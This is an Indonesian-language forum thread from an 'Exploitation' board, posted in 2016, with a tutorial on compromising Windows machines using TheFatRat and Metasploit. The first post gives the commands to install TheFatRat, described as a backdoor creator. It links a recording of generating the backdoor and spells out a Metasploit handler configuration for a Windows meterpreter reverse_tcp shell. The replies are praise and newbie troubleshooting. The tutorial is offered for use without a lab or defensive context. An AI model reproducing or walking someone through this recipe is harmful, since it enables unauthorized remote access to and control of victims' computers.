BackBox Indonesia
Exploit Windows Using TheFatRat dan Metasploit - Printable Version

+- BackBox Indonesia (https://www.backboxindonesia.or.id)
+-- Forum: Attacking (https://www.backboxindonesia.or.id/forum-12.html)
+--- Forum: Exploitation (https://www.backboxindonesia.or.id/forum-13.html)
+--- Thread: Exploit Windows Using TheFatRat dan Metasploit (/thread-156.html)



Exploit Windows Using TheFatRat dan Metasploit - Mr. Rules - 07-30-2016

Fatrat adalah backdoor creator yang di gunakan untuk meremote access perangkat lunak seperti windows, android, mac dan masih banyak lagi yang bisa di gunakan oleh thefatrat ini.
langsung aja gan lets go..

Install fatrat :
Code:
git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat
chmod +x fatrat ; chmod +x powerfull.sh
sudo ./fatrat

Make Backdoornya :
https://asciinema.org/a/76d9tcl1uiikipv8dhjr2vow8

Run Metasploit :
Code:
sudo msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost "ip ente"
set lport 444
exploit
atau klik ini ~> https://asciinema.org/a/7wh8cppwm5a3glwsezcus8riw

Belum paham tonton video tutorialnya disini ~> https://youtu.be/Aw1mxwpmkd4 atau di bawah ini:






RE: Exploit Windows Using TheFatRat dan Metasploit - koboi - 07-31-2016

pertamax


RE: Exploit Windows Using TheFatRat dan Metasploit - Screetsec - 08-14-2016

TheFatRat udah update ke Version yang baru yaaa Codename : Xenogenesis
Bisa di download di http://www.github.com/screetsec/thefatrat


RE: Exploit Windows Using TheFatRat dan Metasploit - rutengflores - 08-27-2016

Perrtamaxx


RE: Exploit Windows Using TheFatRat dan Metasploit - Hightech - 08-29-2016

Mantap Om :D , ntar ane cobain :D


RE: Exploit Windows Using TheFatRat dan Metasploit - jabrik - 09-20-2016

joss, mantap om :D


RE: Exploit Windows Using TheFatRat dan Metasploit - wh0am1 - 09-22-2016

punya ane kok nosigner.jar kang?
salah dimananya ya


RE: Exploit Windows Using TheFatRat dan Metasploit - HoaX_15 - 11-24-2016

Walau ane telat tapi mantap :D

tapi ini kenapa yah gan ? maklum newbie
[x]::[warning]:this script require backdoor-factory installed to work